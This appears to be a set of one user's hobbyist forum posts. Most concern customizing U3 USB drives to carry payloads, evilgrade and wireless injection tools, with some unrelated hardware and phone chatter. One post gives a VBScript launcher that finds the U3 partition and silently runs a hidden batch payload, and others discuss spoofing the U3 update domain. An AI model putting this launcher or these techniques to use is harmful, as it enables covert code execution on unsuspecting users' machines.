  1. You changed the length of the domain?
  2. I've managed to change it to re.usbhack.net, I've no domain names the right length to test though, anyone?
  3. Hmm, very odd indeed. I actually found out with my machine it was down to the floppy drive (ergh). I found this by writing a script which went through the drives looking for a file. Infact I also found that my machine searched A-Z, not Z-A which was mentioned above. What drives do you have? Maybe I can setup something to match?
  4. How far did you get with this? Was the new domain (did it use a domain or IP) the same length as the old? e.g. re.usbhack.net. I gather thats what DingleBerries has been up to. I've been thinking how bad evilgrade could be on large networks with lots of people using standard U3s.
  5. Anyone played much with these?
  6. Nice idea, evilgrade plugin anyone? Oddly my installer is slightly different and uses: /download/apps/lpinstaller/isofiles/PelicanBFG-autorun.iso
  7. Sorry forgot to post yesterday GO.VBS Set objFSO = CreateObject("Scripting.FileSystemObject") Set objShell = CreateObject("Wscript.Shell") Set colDrives = objFSO.Drives Set objEnv = objShell.Environment("PROCESS") objEnv("Year") = Year(now()) objEnv("Month") = Right("0" & Month(now()), 2) objEnv("Day") = Right("0" & Day(now()), 2) objEnv("Hour") = Right("0" & Hour(now()), 2) objEnv("Minute") = Right("0" & Minute(now()), 2) objEnv("Second") = Right("0" & Second(now()), 2) For Each objDrive in colDrives strPath = objDrive.Driveletter & ":" If objDrive.DriveType = 4 Then If objFSO.FileExists(objDrive.DriveLetter & ":\SYSTEM\Start.bat") Then objShell.Run objDrive.DriveLetter & ":\SYSTEM\Start.bat " & strPath , 0, False Exit For End If End If Next Will fix that error, it''ll only try and access a cd/dvd drive or in our case the u3 partition
  8. Which Eee PC were you planing on getting? I had to get a new card (Atheros AR5008) for my Eee 901 to get Aircrack-NG injection working. Since then I have had BT3 with karmetasploit and wifizoo running on it. The 701 is the only Eee PC to support injection out of the box, I think. There is also some custom BT3 modules out the for the Eee PC 901 to get the graphics running at 1024 x 600 with ease.
  9. Strange! I have no card readers in my machine which I have been testing on. I'll find out if the restore patition is causing the problem for me shortly.
  10. I need to test it fully, I ran out of time, but I'm sure the problem is down to drives with no drive letter assigned (recovery partitions). I'll test it in the morning.
  11. I've made a quick fix in mine also, till the next release. I also have found that to run the customizer on my drives I need to run launchpadremoval.exe everytime first.
  12. I understand that Jen, I was looking into as much info on the problem and looking into fixing myself. Ninja GF: I'm running XP.
  13. OK, its worked, but now I get an error when its inserted. The payload still executes if continue or cancel is pressed. If I run GO.VBS directly I get: Which is this line: objShell.Run ".\System\Start.bat " & strPath , 0, False
  14. It's running at the stock speed.
  15. When trying to customize both of my U3s, I get this error everytime: "Failed to access your U3 drive smart drive. U3 customizer will now shut down". I'm running xp, any ideas?
  16. After a lot of thought, I'm going to have a go at modding mine with a 6V rechargeable battery pack into the casing of one of these: http://cgi.ebay.co.uk/ws/eBayISAPI.dll?Vie...em=370096440265 I'll mod the RJ45 to the cable socket and the power/charger jack and power switch to the bottom, which I'll fill the original holes and respray silver. My intial plans was to use one of those secret stash cans, but I don't think there is any to get everything to fit due to the way the lid fits. I have one on order and will check though.

    finding hidden essid

I'm sure that windows just displays "unnamed network" does it not? I've seen these same AP's in netstumber and simply have no essid in the list.

    Netbook Choice

Personaly, I'm unsure. I decided on the Asus 901 in the end after a lot of thought, I needed to change the Wireless card to a descent Atheros to get Aircrack-ng up an running with the onboard card. This might also be the case with the Lenonvo and Acer. My point is that you should be able to just change the card to get it running with Aircrack-NG etc, anoying but not the end of the world.
  19. I've a curve at the moment also. I can't make up my mind at the moment, it's either got to be the HTC Touch Pro, Blackberry Thunder/Storm (not sure on the touch qwerty tho), or wait to see what other Android phones are realesed (aweful recpection with T-Mobile where I live in UK). My upgrade isn't till late next month.

  21. Make sure that your PSU has: A ) the power B ) the right connectors to hook up to the card I recentlly bought a friends hand me down an ATI 1950XTX for a whopping £40 and found out that I needed a 6 pin connector which the original PSU did not have. £20 later and another hand me down part, I was away playing TF2 on pretty much full settings.
